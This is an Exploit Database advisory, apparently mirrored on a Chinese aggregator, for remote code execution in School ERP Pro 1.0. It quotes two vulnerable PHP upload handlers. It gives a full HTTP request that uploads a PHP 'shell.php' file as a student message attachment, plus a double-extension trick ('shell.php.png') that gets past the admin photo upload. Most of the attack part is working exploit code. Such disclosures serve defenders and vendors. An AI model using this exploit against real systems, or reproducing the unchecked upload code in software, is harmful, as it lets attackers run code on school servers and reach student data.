School ERP Pro 1.0 – Remote Code Execution

• Exploit Database
• 42 阅读

• 作者： Besim
  日期： 2020-04-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48392/

• # Exploit Title: School ERP Pro 1.0 - Remote Code Execution
  # Date: 2020-04-28
  # Author: Besim ALTINOK
  # Vendor Homepage: http://arox.in
  # Software Link: https://sourceforge.net/projects/school-erp-ultimate/
  # Version: latest version
  # Tested on: Xampp
  # Credit: İsmail BOZKURT
  
  Description
  -------------------------------------------
  A student can send a message to the admin. Additionally, with this method,
  the student can upload a PHP file to the system and run code in the system.
  
  ------------------------------------
  *Vulnerable code - 1: (for student area) - sendmail.inc.php*
  - Student user can send message to admin with the attachment
  ------------------------------------
  $image_file = basename($_FILES['newimage']['name'][$i]);
  $ext=explode(".",$_FILES['newimage']['name'][$i]);
  $str=date("mdY_hms");
  //$t=rand(1, 15);
  $new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
  $updir = "images/messagedoc/";
  $dest_path = $updir.$new_thumbname;
  $up_images[$i] = $dest_path;
  $srcfile = $_FILES['newimage']['tmp_name'][$i];
  @move_uploaded_file($srcfile, $dest_path);
  $ins_arr_prod_images = array(
  '`es_messagesid`'=> $id,
  '`message_doc`' => $new_thumbname
  );
  $idss=$db->insert("es_message_documents",$ins_arr_prod_images);
  
  ---------------------------------------------------
  *PoC of the Remote Code Execution*
  ---------------------------------------------------
  
  POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 ***************************
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-GB,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer:
  http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
  Content-Type: multipart/form-data;
  boundary=---------------------------2104557667975595321153031663
  Content-Length: 718
  DNT: 1
  Connection: close
  Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
  Upgrade-Insecure-Requests: 1
  
  -----------------------------2104557667975595321153031663
  Content-Disposition: form-data; name="subject"
  
  DEDED
  -----------------------------2104557667975595321153031663
  Content-Disposition: form-data; name="message"
  
  <p>DEDED</p>
  -----------------------------2104557667975595321153031663
  Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
  Content-Type: text/php
  
  <?php phpinfo(); ?>
  
  -----------------------------2104557667975595321153031663
  Content-Disposition: form-data; name="filecount[]"
  
  1
  -----------------------------2104557667975595321153031663
  Content-Disposition: form-data; name="submit_staff"
  
  Send
  -----------------------------2104557667975595321153031663--
  
  
  ------------------------------------
  *Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
  - Admin user can update user profile photo
  ------------------------------------
  if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
  $ext = explode(".",$_FILES['pre_image']['name']);
  $str = date("mdY_hms");
  $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
  $updir = "images/student_photos/";
  $uppath = $updir.$new_thumbname;
  move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
  $file = $new_thumbname;
  
  ------------------------------------
  Bypass Technique:
  ------------------------------------
  
  $_FILES['pre_image']['name']; --- > shell.php.png
  $ext = explode(".",$_FILES['pre_image']['name']);
  ---
  $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
  $ext[0] --> shell
  $ext[1] --> php
  lastfilename --> st_date_shell.php